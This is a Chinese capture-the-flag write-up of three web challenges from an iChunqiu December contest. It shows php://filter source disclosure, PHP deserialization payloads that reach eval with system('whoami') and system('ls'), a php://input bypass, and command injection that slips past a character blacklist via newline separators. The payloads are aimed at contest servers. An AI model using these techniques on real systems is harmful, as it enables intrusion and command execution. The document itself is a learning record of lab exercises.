i春秋夺旗赛(第四季)12月赛部分web write up题解
题主也是个刚入门的小菜鸡,而且最近临近期末,无奈能力有限只能作出部分web题(未完待续…)
题目:nani
看源码有提示,构造语句读取user.php
http://120.55.43.255:24719/index.php?file=php://filter/read=convert.base64-encode/resource=user.php
base64解码,得出源码
<?php
class convent{
var $warn = "No hacker.";
function __destruct(){
eval($this->warn);
}
function __wakeup(){
foreach(get_object_vars($this) as $k => $v) {
$this->$k = null;
}
}
}
$cmd = $_POST[cmd];
unserialize($cmd);
?>
构造序列化语句:
s对应的是string的字数,所以
cmd=O:7:“convent”:2:{s:4:“warn”;s:17:“system(“whoami”);”;}s对应的是string的字数,所以
cmd=O:7:“convent”:2:{s:4:“warn”;s:13:“system(“ls”);”;}懒得数字数,直接python。
改下s数量 直接得flag
题目:admin
看源码有提示
<!--
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];
if(isset($user)&&(file_get_contents($user,'r')==="admin")){
echo "hello admin!<br>";
include($file); //class.php
}else{
echo "you are not admin ! ";
}
-->
构造http://120.55.43.255:28119/?user=php://input&file=php://filter/convert.base64-encode/resource=class.php&pass=1
Post传递admin
解码得出
<?php
error_reporting(E_ALL & ~E_NOTICE);
class Read{//fffffflag.php
public $file;
public function __toString(){
if(isset($this->file)){
echo file_get_contents($this->file);
}
return "Awwwwwwwwwww man";
}
}
?>
最后构造序列化
http://localhost:8000/?user=php://input&file=class.php&pass=O:4:“Read”:1:{s:4:“file”;s:62:“php://filter/read=convert.base64-encode/resource= fffffflag.php”;}
最后base64解码 得出flag
题目:Ping
看源码有提示构造
http://120.55.43.255:21173/?path=php://filter/read=convert.base64-encode/resource=ping.php
post传输password[]=asdasd
base64解码得出源码
<?php
if(isset($_REQUEST[ 'ip' ])) {
$target = trim($_REQUEST[ 'ip' ]);
$substitutions = array(
'&' => '',
';' => '',
'|' => '',
'-' => '',
'$' => '',
'(' => '',
')' => '',
'`' => '',
'||' => '',
);
$target = str_replace( array_keys( $substitutions ), $substitutions, $target );
$cmd = shell_exec( 'ping -c 4 ' . $target );
echo $target;
echo "<pre>{$cmd}</pre>";
}
我们进行绕过处理
linux中:%0a 、%0d 、; 、& 、| 、&&、||
windows中:%0a、&、|、%1a(一个神奇的角色,作为.bat文件中的命令分隔符)
最后直接cat 得flag